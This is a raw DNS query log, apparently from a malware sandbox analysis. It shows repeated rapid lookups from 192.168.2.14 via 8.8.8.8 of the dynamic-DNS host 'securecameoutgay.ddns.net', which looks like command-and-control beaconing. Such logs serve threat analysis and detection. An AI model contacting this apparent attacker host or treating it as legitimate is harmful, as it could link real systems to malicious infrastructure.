                                                    Oct 12, 2024 23:05:21.466423988 CEST192.168.2.148.8.8.80xd6f0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.473408937 CEST192.168.2.148.8.8.80x1dedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.479861975 CEST192.168.2.148.8.8.80x1dedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.486440897 CEST192.168.2.148.8.8.80x1dedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.493262053 CEST192.168.2.148.8.8.80x1dedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.501629114 CEST192.168.2.148.8.8.80x1dedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.512423038 CEST192.168.2.148.8.8.80x4064Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.519162893 CEST192.168.2.148.8.8.80x4064Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.526159048 CEST192.168.2.148.8.8.80x4064Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.533438921 CEST192.168.2.148.8.8.80x4064Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.544341087 CEST192.168.2.148.8.8.80x4064Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.556796074 CEST192.168.2.148.8.8.80xf590Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.565095901 CEST192.168.2.148.8.8.80xf590Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.571774960 CEST192.168.2.148.8.8.80xf590Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.578658104 CEST192.168.2.148.8.8.80xf590Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.585093975 CEST192.168.2.148.8.8.80xf590Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.591804981 CEST192.168.2.148.8.8.80x998aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.598723888 CEST192.168.2.148.8.8.80x998aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.607403040 CEST192.168.2.148.8.8.80x998aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.615945101 CEST192.168.2.148.8.8.80x998aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.622668982 CEST192.168.2.148.8.8.80x998aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.629070997 CEST192.168.2.148.8.8.80x849cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.635896921 CEST192.168.2.148.8.8.80x849cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.642746925 CEST192.168.2.148.8.8.80x849cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.649658918 CEST192.168.2.148.8.8.80x849cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.656986952 CEST192.168.2.148.8.8.80x849cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.663841009 CEST192.168.2.148.8.8.80x15dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.670473099 CEST192.168.2.148.8.8.80x15dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:21.677248955 CEST192.168.2.148.8.8.80x15dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.504038095 CEST192.168.2.148.8.8.80x15dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.517831087 CEST192.168.2.148.8.8.80x15dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.525304079 CEST192.168.2.148.8.8.80xaf1aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.531613111 CEST192.168.2.148.8.8.80xaf1aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.542035103 CEST192.168.2.148.8.8.80xaf1aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.548970938 CEST192.168.2.148.8.8.80xaf1aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.557250023 CEST192.168.2.148.8.8.80xaf1aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.563710928 CEST192.168.2.148.8.8.80xd244Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.570383072 CEST192.168.2.148.8.8.80xd244Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.577014923 CEST192.168.2.148.8.8.80xd244Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.583476067 CEST192.168.2.148.8.8.80xd244Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.590286970 CEST192.168.2.148.8.8.80xd244Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.596678019 CEST192.168.2.148.8.8.80x904fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.603174925 CEST192.168.2.148.8.8.80x904fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.609721899 CEST192.168.2.148.8.8.80x904fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.616192102 CEST192.168.2.148.8.8.80x904fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.622657061 CEST192.168.2.148.8.8.80x904fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.629307032 CEST192.168.2.148.8.8.80x2ab7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.635869980 CEST192.168.2.148.8.8.80x2ab7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.642241001 CEST192.168.2.148.8.8.80x2ab7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.649008036 CEST192.168.2.148.8.8.80x2ab7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.655989885 CEST192.168.2.148.8.8.80x2ab7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.662559986 CEST192.168.2.148.8.8.80x18e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.669202089 CEST192.168.2.148.8.8.80x18e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.675723076 CEST192.168.2.148.8.8.80x18e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.682020903 CEST192.168.2.148.8.8.80x18e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.688905001 CEST192.168.2.148.8.8.80x18e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.695879936 CEST192.168.2.148.8.8.80xfcf7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.702451944 CEST192.168.2.148.8.8.80xfcf7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.708899021 CEST192.168.2.148.8.8.80xfcf7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.715262890 CEST192.168.2.148.8.8.80xfcf7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.721831083 CEST192.168.2.148.8.8.80xfcf7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.728749037 CEST192.168.2.148.8.8.80x9fecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.735276937 CEST192.168.2.148.8.8.80x9fecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.741846085 CEST192.168.2.148.8.8.80x9fecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.748327971 CEST192.168.2.148.8.8.80x9fecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.755182028 CEST192.168.2.148.8.8.80x9fecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.761818886 CEST192.168.2.148.8.8.80x622dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.768882036 CEST192.168.2.148.8.8.80x622dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.775836945 CEST192.168.2.148.8.8.80x622dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.782808065 CEST192.168.2.148.8.8.80x622dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.789743900 CEST192.168.2.148.8.8.80x622dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.796555996 CEST192.168.2.148.8.8.80x30ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.803050995 CEST192.168.2.148.8.8.80x30ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.809550047 CEST192.168.2.148.8.8.80x30ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.816109896 CEST192.168.2.148.8.8.80x30ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.822738886 CEST192.168.2.148.8.8.80x30ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.829576015 CEST192.168.2.148.8.8.80xeb5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.836139917 CEST192.168.2.148.8.8.80xeb5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.842643023 CEST192.168.2.148.8.8.80xeb5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.849355936 CEST192.168.2.148.8.8.80xeb5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.855809927 CEST192.168.2.148.8.8.80xeb5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.862340927 CEST192.168.2.148.8.8.80x91e0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.868951082 CEST192.168.2.148.8.8.80x91e0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.875488997 CEST192.168.2.148.8.8.80x91e0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.882152081 CEST192.168.2.148.8.8.80x91e0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.888844013 CEST192.168.2.148.8.8.80x91e0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.895821095 CEST192.168.2.148.8.8.80xabd8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.902746916 CEST192.168.2.148.8.8.80xabd8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.909161091 CEST192.168.2.148.8.8.80xabd8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.915644884 CEST192.168.2.148.8.8.80xabd8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.922391891 CEST192.168.2.148.8.8.80xabd8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.929301023 CEST192.168.2.148.8.8.80x1eeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.935856104 CEST192.168.2.148.8.8.80x1eeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.942588091 CEST192.168.2.148.8.8.80x1eeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.949337006 CEST192.168.2.148.8.8.80x1eeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.955761909 CEST192.168.2.148.8.8.80x1eeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.962431908 CEST192.168.2.148.8.8.80x812dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.969252110 CEST192.168.2.148.8.8.80x812dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.975553036 CEST192.168.2.148.8.8.80x812dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.982103109 CEST192.168.2.148.8.8.80x812dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.988733053 CEST192.168.2.148.8.8.80x812dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:22.995620012 CEST192.168.2.148.8.8.80x3785Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.002537966 CEST192.168.2.148.8.8.80x3785Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.009278059 CEST192.168.2.148.8.8.80x3785Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.016216040 CEST192.168.2.148.8.8.80x3785Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.023020983 CEST192.168.2.148.8.8.80x3785Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.030128956 CEST192.168.2.148.8.8.80x2449Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.036998987 CEST192.168.2.148.8.8.80x2449Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.050091028 CEST192.168.2.148.8.8.80x2449Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.056968927 CEST192.168.2.148.8.8.80x2449Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.063772917 CEST192.168.2.148.8.8.80x2449Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.070220947 CEST192.168.2.148.8.8.80xbfdaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.076595068 CEST192.168.2.148.8.8.80xbfdaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.083146095 CEST192.168.2.148.8.8.80xbfdaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.089683056 CEST192.168.2.148.8.8.80xbfdaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.096879005 CEST192.168.2.148.8.8.80xbfdaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.103559971 CEST192.168.2.148.8.8.80xc929Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.110167980 CEST192.168.2.148.8.8.80xc929Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.116919994 CEST192.168.2.148.8.8.80xc929Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.123676062 CEST192.168.2.148.8.8.80xc929Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.130505085 CEST192.168.2.148.8.8.80xc929Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.137073994 CEST192.168.2.148.8.8.80x52f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.144337893 CEST192.168.2.148.8.8.80x52f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.150897026 CEST192.168.2.148.8.8.80x52f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.157334089 CEST192.168.2.148.8.8.80x52f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.164050102 CEST192.168.2.148.8.8.80x52f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.170859098 CEST192.168.2.148.8.8.80x402eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.177817106 CEST192.168.2.148.8.8.80x402eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.186058998 CEST192.168.2.148.8.8.80x402eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.192347050 CEST192.168.2.148.8.8.80x402eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.198976040 CEST192.168.2.148.8.8.80x402eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.205379009 CEST192.168.2.148.8.8.80x22a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.211750031 CEST192.168.2.148.8.8.80x22a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.218064070 CEST192.168.2.148.8.8.80x22a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.225243092 CEST192.168.2.148.8.8.80x22a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.233117104 CEST192.168.2.148.8.8.80x22a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.239885092 CEST192.168.2.148.8.8.80x5747Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.246659994 CEST192.168.2.148.8.8.80x5747Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.253346920 CEST192.168.2.148.8.8.80x5747Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.259686947 CEST192.168.2.148.8.8.80x5747Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.266509056 CEST192.168.2.148.8.8.80x5747Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.273097038 CEST192.168.2.148.8.8.80xaebbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.279752970 CEST192.168.2.148.8.8.80xaebbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.286243916 CEST192.168.2.148.8.8.80xaebbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.292707920 CEST192.168.2.148.8.8.80xaebbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.299544096 CEST192.168.2.148.8.8.80xaebbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.306318998 CEST192.168.2.148.8.8.80x1e6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.312747955 CEST192.168.2.148.8.8.80x1e6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.319360018 CEST192.168.2.148.8.8.80x1e6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.326278925 CEST192.168.2.148.8.8.80x1e6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.333029032 CEST192.168.2.148.8.8.80x1e6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.340070009 CEST192.168.2.148.8.8.80x4573Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.346445084 CEST192.168.2.148.8.8.80x4573Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.352858067 CEST192.168.2.148.8.8.80x4573Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.359344959 CEST192.168.2.148.8.8.80x4573Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.365881920 CEST192.168.2.148.8.8.80x4573Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.372716904 CEST192.168.2.148.8.8.80x615eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.379367113 CEST192.168.2.148.8.8.80x615eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.385873079 CEST192.168.2.148.8.8.80x615eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.392357111 CEST192.168.2.148.8.8.80x615eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.399286985 CEST192.168.2.148.8.8.80x615eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.405810118 CEST192.168.2.148.8.8.80xb076Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.412240982 CEST192.168.2.148.8.8.80xb076Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.419204950 CEST192.168.2.148.8.8.80xb076Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.425879002 CEST192.168.2.148.8.8.80xb076Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.432571888 CEST192.168.2.148.8.8.80xb076Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.439234972 CEST192.168.2.148.8.8.80x55efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.445827007 CEST192.168.2.148.8.8.80x55efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.452629089 CEST192.168.2.148.8.8.80x55efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.459290028 CEST192.168.2.148.8.8.80x55efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.465708971 CEST192.168.2.148.8.8.80x55efStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.472342014 CEST192.168.2.148.8.8.80x16d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.478854895 CEST192.168.2.148.8.8.80x16d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.485532045 CEST192.168.2.148.8.8.80x16d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.494124889 CEST192.168.2.148.8.8.80x16d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.500984907 CEST192.168.2.148.8.8.80x16d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.507668972 CEST192.168.2.148.8.8.80xde69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.514667988 CEST192.168.2.148.8.8.80xde69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.522604942 CEST192.168.2.148.8.8.80xde69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.529731035 CEST192.168.2.148.8.8.80xde69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.536387920 CEST192.168.2.148.8.8.80xde69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.542999029 CEST192.168.2.148.8.8.80x18c9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.549345016 CEST192.168.2.148.8.8.80x18c9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.556088924 CEST192.168.2.148.8.8.80x18c9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.566512108 CEST192.168.2.148.8.8.80x18c9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.573216915 CEST192.168.2.148.8.8.80x18c9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.579768896 CEST192.168.2.148.8.8.80xba4fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.586385965 CEST192.168.2.148.8.8.80xba4fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
